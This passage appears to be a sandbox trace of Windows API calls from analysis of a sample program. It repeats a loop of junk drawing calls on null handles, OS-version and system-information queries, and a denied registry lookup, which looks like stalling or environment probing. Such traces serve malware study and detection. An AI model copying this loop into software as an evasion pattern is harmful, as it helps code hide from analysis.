lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.755] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.755] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.755] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.755] BeginPath (hdc=0x0) returned 0 [0087.755] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.755] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.755] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.755] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.755] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.755] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.755] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.755] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.755] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc10401d0 [0087.755] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc30401cd [0087.755] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b10 [0087.755] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b11 [0087.755] CombineRgn (hrgnDst=0x1040b10, hrgnSrc1=0xc10401d0, hrgnSrc2=0xc30401cd, iMode=1) returned 1 [0087.756] CombineRgn (hrgnDst=0x1040b11, hrgnSrc1=0xc10401d0, hrgnSrc2=0xc30401cd, iMode=4) returned 2 [0087.756] CreateSolidBrush (color=0xff) returned 0x2100b0f [0087.756] CreateSolidBrush (color=0xff0000) returned 0x1100b12 [0087.756] DeleteObject (ho=0x1100b12) returned 1 [0087.756] DeleteObject (ho=0xc30401cd) returned 1 [0087.756] DeleteObject (ho=0xc10401d0) returned 1 [0087.756] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.756] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.756] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.756] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.756] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.756] BeginPath (hdc=0x0) returned 0 [0087.756] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.756] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.756] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.756] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.756] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.756] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.756] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.756] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.756] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc40401cd [0087.756] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc20401d0 [0087.756] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b13 [0087.756] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b14 [0087.756] CombineRgn (hrgnDst=0x1040b13, hrgnSrc1=0xc40401cd, hrgnSrc2=0xc20401d0, iMode=1) returned 1 [0087.756] CombineRgn (hrgnDst=0x1040b14, hrgnSrc1=0xc40401cd, hrgnSrc2=0xc20401d0, iMode=4) returned 2 [0087.756] CreateSolidBrush (color=0xff) returned 0x2100b12 [0087.756] CreateSolidBrush (color=0xff0000) returned 0x1100b15 [0087.756] DeleteObject (ho=0x1100b15) returned 1 [0087.756] DeleteObject (ho=0xc20401d0) returned 1 [0087.756] DeleteObject (ho=0xc40401cd) returned 1 [0087.756] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.756] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.756] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.756] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.756] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.756] BeginPath (hdc=0x0) returned 0 [0087.756] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.756] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.756] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.756] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.756] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.756] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.757] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.757] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.757] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc30401d0 [0087.757] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc50401cd [0087.757] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b16 [0087.757] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b17 [0087.757] CombineRgn (hrgnDst=0x1040b16, hrgnSrc1=0xc30401d0, hrgnSrc2=0xc50401cd, iMode=1) returned 1 [0087.757] CombineRgn (hrgnDst=0x1040b17, hrgnSrc1=0xc30401d0, hrgnSrc2=0xc50401cd, iMode=4) returned 2 [0087.757] CreateSolidBrush (color=0xff) returned 0x2100b15 [0087.757] CreateSolidBrush (color=0xff0000) returned 0x1100b18 [0087.757] DeleteObject (ho=0x1100b18) returned 1 [0087.757] DeleteObject (ho=0xc50401cd) returned 1 [0087.757] DeleteObject (ho=0xc30401d0) returned 1 [0087.757] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.757] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.757] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.757] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.757] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.757] BeginPath (hdc=0x0) returned 0 [0087.757] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.757] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.757] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.757] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.757] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.757] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.757] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.757] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.757] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc60401cd [0087.757] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc40401d0 [0087.757] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b19 [0087.757] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b1a [0087.757] CombineRgn (hrgnDst=0x1040b19, hrgnSrc1=0xc60401cd, hrgnSrc2=0xc40401d0, iMode=1) returned 1 [0087.757] CombineRgn (hrgnDst=0x1040b1a, hrgnSrc1=0xc60401cd, hrgnSrc2=0xc40401d0, iMode=4) returned 2 [0087.757] CreateSolidBrush (color=0xff) returned 0x2100b18 [0087.757] CreateSolidBrush (color=0xff0000) returned 0x1100b1b [0087.757] DeleteObject (ho=0x1100b1b) returned 1 [0087.757] DeleteObject (ho=0xc40401d0) returned 1 [0087.757] DeleteObject (ho=0xc60401cd) returned 1 [0087.758] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.758] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.758] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.758] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.758] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.758] BeginPath (hdc=0x0) returned 0 [0087.758] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.758] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.758] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.758] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.758] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.758] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.758] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.758] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.758] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc50401d0 [0087.758] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc70401cd [0087.758] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b1c [0087.758] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b1d [0087.758] CombineRgn (hrgnDst=0x1040b1c, hrgnSrc1=0xc50401d0, hrgnSrc2=0xc70401cd, iMode=1) returned 1 [0087.758] CombineRgn (hrgnDst=0x1040b1d, hrgnSrc1=0xc50401d0, hrgnSrc2=0xc70401cd, iMode=4) returned 2 [0087.758] CreateSolidBrush (color=0xff) returned 0x2100b1b [0087.758] CreateSolidBrush (color=0xff0000) returned 0x1100b1e [0087.758] DeleteObject (ho=0x1100b1e) returned 1 [0087.758] DeleteObject (ho=0xc70401cd) returned 1 [0087.758] DeleteObject (ho=0xc50401d0) returned 1 [0087.758] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.758] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.758] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.758] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.758] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.758] BeginPath (hdc=0x0) returned 0 [0087.758] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.758] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.758] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.758] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.758] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.758] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.758] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.758] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.759] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc80401cd [0087.759] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc60401d0 [0087.759] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b1f [0087.759] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b20 [0087.759] CombineRgn (hrgnDst=0x1040b1f, hrgnSrc1=0xc80401cd, hrgnSrc2=0xc60401d0, iMode=1) returned 1 [0087.759] CombineRgn (hrgnDst=0x1040b20, hrgnSrc1=0xc80401cd, hrgnSrc2=0xc60401d0, iMode=4) returned 2 [0087.759] CreateSolidBrush (color=0xff) returned 0x2100b1e [0087.759] CreateSolidBrush (color=0xff0000) returned 0x1100b21 [0087.759] DeleteObject (ho=0x1100b21) returned 1 [0087.759] DeleteObject (ho=0xc60401d0) returned 1 [0087.759] DeleteObject (ho=0xc80401cd) returned 1 [0087.759] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.759] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.759] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.759] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.759] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.759] BeginPath (hdc=0x0) returned 0 [0087.759] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.759] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.759] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.759] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.759] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.759] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.759] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.759] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.759] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc70401d0 [0087.759] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc90401cd [0087.759] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b22 [0087.759] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b23 [0087.759] CombineRgn (hrgnDst=0x1040b22, hrgnSrc1=0xc70401d0, hrgnSrc2=0xc90401cd, iMode=1) returned 1 [0087.759] CombineRgn (hrgnDst=0x1040b23, hrgnSrc1=0xc70401d0, hrgnSrc2=0xc90401cd, iMode=4) returned 2 [0087.759] CreateSolidBrush (color=0xff) returned 0x2100b21 [0087.759] CreateSolidBrush (color=0xff0000) returned 0x1100b24 [0087.759] DeleteObject (ho=0x1100b24) returned 1 [0087.759] DeleteObject (ho=0xc90401cd) returned 1 [0087.759] DeleteObject (ho=0xc70401d0) returned 1 [0087.759] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.759] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.760] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.760] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.760] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.760] BeginPath (hdc=0x0) returned 0 [0087.760] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.760] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.760] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.760] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.760] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.760] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.760] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.760] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.793] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xca0401cd [0087.793] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc80401d0 [0087.793] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bbe [0087.793] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bbf [0087.793] CombineRgn (hrgnDst=0x1040bbe, hrgnSrc1=0xca0401cd, hrgnSrc2=0xc80401d0, iMode=1) returned 1 [0087.793] CombineRgn (hrgnDst=0x1040bbf, hrgnSrc1=0xca0401cd, hrgnSrc2=0xc80401d0, iMode=4) returned 2 [0087.793] CreateSolidBrush (color=0xff) returned 0x2100b24 [0087.793] CreateSolidBrush (color=0xff0000) returned 0x1100bc0 [0087.793] DeleteObject (ho=0x1100bc0) returned 1 [0087.793] DeleteObject (ho=0xc80401d0) returned 1 [0087.793] DeleteObject (ho=0xca0401cd) returned 1 [0087.793] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.793] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.793] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.793] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.793] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.793] BeginPath (hdc=0x0) returned 0 [0087.794] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.794] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.794] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.794] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.794] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.794] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.794] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.794] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.794] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc90401d0 [0087.794] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcb0401cd [0087.794] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bc1 [0087.794] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bc2 [0087.794] CombineRgn (hrgnDst=0x1040bc1, hrgnSrc1=0xc90401d0, hrgnSrc2=0xcb0401cd, iMode=1) returned 1 [0087.794] CombineRgn (hrgnDst=0x1040bc2, hrgnSrc1=0xc90401d0, hrgnSrc2=0xcb0401cd, iMode=4) returned 2 [0087.794] CreateSolidBrush (color=0xff) returned 0x2100bc0 [0087.794] CreateSolidBrush (color=0xff0000) returned 0x1100bc3 [0087.794] DeleteObject (ho=0x1100bc3) returned 1 [0087.794] DeleteObject (ho=0xcb0401cd) returned 1 [0087.794] DeleteObject (ho=0xc90401d0) returned 1 [0087.794] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.794] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.794] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.794] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.794] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.794] BeginPath (hdc=0x0) returned 0 [0087.794] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.794] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.794] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.794] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.794] GetWindowRect (in: hWnd=0x0, 